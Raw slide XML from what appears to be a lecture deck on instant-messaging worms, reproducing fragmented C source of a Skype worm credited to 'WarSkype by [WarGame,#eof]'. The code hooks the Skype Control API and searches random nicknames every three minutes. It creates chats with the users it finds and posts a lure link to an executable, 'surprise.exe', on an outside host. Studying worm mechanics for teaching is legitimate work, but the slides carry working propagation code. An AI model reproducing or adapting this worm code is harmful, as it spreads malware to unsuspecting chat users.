              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>			NULL,&amp;inf_prog,&amp;info_pr))</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>		{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>			MessageBox(NULL,"Allow this program in skype!","Warning!"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>				,MB_OK|MB_ICONWARNING);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>		}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>		else </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>		{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>			ERROR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>		}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="020206030504050203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IM Worms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3" name="Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="277813" y="1043305"/>
            <a:ext cx="11663045" cy="5406390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>int __stdcall WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)</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MSG oMessage;</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SkypeAttach = RegisterWindowMessage("SkypeControlAPIAttach");</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SkypeDiscover = RegisterWindowMessage("SkypeControlAPIDiscover");</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RunSkype(); /* (try to) run skype */</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if(SkypeAttach != 0 &amp;&amp; SkypeDiscover != 0)</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	</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MakeWindow(); /* Create window */</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SendMessage(HWND_BROADCAST,  //A handle to the window whose window procedure will receive the message. </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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SkypeAttach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>,   //The message to be sent.</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Answer,  //A handle to the window passing the data.</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0);   //A pointer to a COPYDATASTRUCT structure that contains the data to be passed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pP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while(GetMessage( &amp;oMessage, 0, 0, 0)!=FALSE) //return all available messages</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TranslateMessage(&amp;oMessage);</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DispatchMessage(&amp;oMessage);</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80000"/>
              </a:lnSpc>
            </a:pP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80000"/>
              </a:lnSpc>
            </a:pP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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="0202060305040502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IM Worms-Create a window</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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-80010" y="6405245"/>
            <a:ext cx="12438380" cy="60261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Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2228850" y="1005205"/>
            <a:ext cx="7734300" cy="5742940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>void MakeWindow(void)</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WNDCLASS wndcls;</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memset(&amp;wndcls,0,sizeof(WNDCLASS));</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wndcls.lpszClassName = "WarSkype by [WarGame,#eof]";</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>wndcls.lpfnWndProc = SkypeProc;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pP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if(RegisterClass(&amp;wndcls) == 0)</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ExitProcess(0);</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80000"/>
              </a:lnSpc>
            </a:pP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Answer = CreateWindowEx(0,  // Optional window styles.</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wndcls.lpszClassName,  // Window class</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"Skype sucks!",              // Window text</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0,                 // Window style</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-1, -1, 0, 0,   // Size and position</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(HWND)NULL,  // Parent window </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(HMENU)NULL, // Menu</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(HINSTANCE)NULL,  // Instance handle</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NULL);  // Additional application data               </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if(Answer == NULL)</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ExitProcess(0);</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="0202060305040502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IM Worms-Generate random nicknames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4" name="Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975360" y="1068388"/>
            <a:ext cx="10399395" cy="6170295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>DWORD WINAPI S3arch(LPVOID Data)</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	char msg[128];</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	COPYDATASTRUCT cds;</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	while(1)</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	GetRandNick();</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	sprintf(msg,"SEARCH USERS %s",rnd_nick);</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	cds.dwData= 0;</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                  cds.lpData= msg;</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                  cds.cbData= strlen(msg)+1;	       </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	if(!SendMessage(SkypeWnd, WM_COPYDATA, Answer , (LPARAM)&amp;cds))</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		/* skype closed */</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		ExitProcess(0);</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	Sleep((1000*60)*3); /* every 3 minutes */</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130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="020206030504050203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IM Worms-Behaviors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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-80010" y="6405245"/>
            <a:ext cx="12438380" cy="60261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Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="50800" y="1143635"/>
            <a:ext cx="12878435" cy="7414895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>LRESULT CALLBACK SkypeProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)</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PCOPYDATASTRUCT SkypeData = NULL;</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DWORD ThreadID;</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char *found_users = NULL,*chat_cmd = NULL,*chat_id = NULL,msg_cmd[256];</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COPYDATASTRUCT cds;</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if(uMsg == SkypeAttach)</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if(lParam == 0)</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SkypeWnd = (HWND)wParam;</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CreateThread(NULL,0,&amp;S3arch,0,0,&amp;ThreadID);</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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if(uMsg == WM_COPYDATA)</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if(wParam == SkypeWnd)</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SkypeData=(PCOPYDATASTRUCT)lParam;</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if(SkypeData != NULL)</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if(strstr(SkypeData-&gt;lpData,"CHAT "))</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strtok(SkypeData-&gt;lpData," ");</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chat_id = strtok(NULL," ");</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 this will send the url to everybody :) */</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>sprintf(msg_cmd,"CHATMESSAGE %s Check this! http://marx2.altervista.org/surprise.exe",chat_id)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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cds.dwData= 0;</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cds.lpData= msg_cmd;</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cds.cbData= strlen(msg_cmd)+1;	       </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>SendMessage(SkypeWnd, WM_COPYDATA, Answer , (LPARAM)&amp;cds);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>				}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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00463542 -0.433796 " pathEditMode="relative" rAng="0" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="7" y="-2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0010" y="6405245"/>
            <a:ext cx="12438380" cy="60261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矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2210435" y="1004570"/>
            <a:ext cx="8439785" cy="5662295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F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IM Worms-Behaviors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4" name="Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1160145" y="1053465"/>
            <a:ext cx="11515090" cy="5657215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>				if(strstr(SkypeData-&gt;lpData,"USERS "))</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found_users = (char *)GlobalAlloc(GMEM_ZEROINIT|GMEM_FIXED,3096);</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if(found_users == NULL)</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ExitProcess(0);</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70000"/>
              </a:lnSpc>
            </a:pP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chat_cmd = (char *)GlobalAlloc(GMEM_ZEROINIT|GMEM_FIXED,3096+128);</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if(chat_cmd == NULL)</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ExitProcess(0);</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70000"/>
              </a:lnSpc>
            </a:pP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strcpy(found_users,(char *)SkypeData-&gt;lpData);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pP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strcpy(found_users,found_users+6);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pP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sprintf(chat_cmd,"CHAT CREATE %s",found_users);</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 contact them :) */</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cds.dwData= 0;</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cds.lpData= chat_cmd;</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cds.cbData= strlen(chat_cmd)+1;	       </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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>SendMessage(SkypeWnd, WM_COPYDATA, Answer , (LPARAM)&amp;cds);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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GlobalFree(found_users);</a:t>
            </a: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GlobalFree(chat_cmd);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>				}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="0202060305040502030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IM Worms-Behaviors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6" name="Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2331403" y="1798320"/>
            <a:ext cx="7529195" cy="3636010"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>			}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>		}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	DefWindowProc( hWnd, uMsg , wParam, lParam);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	return 1; /* != 0 */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr 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IM Worms-Generate random nicknames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4" name="Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2459673" y="1489075"/>
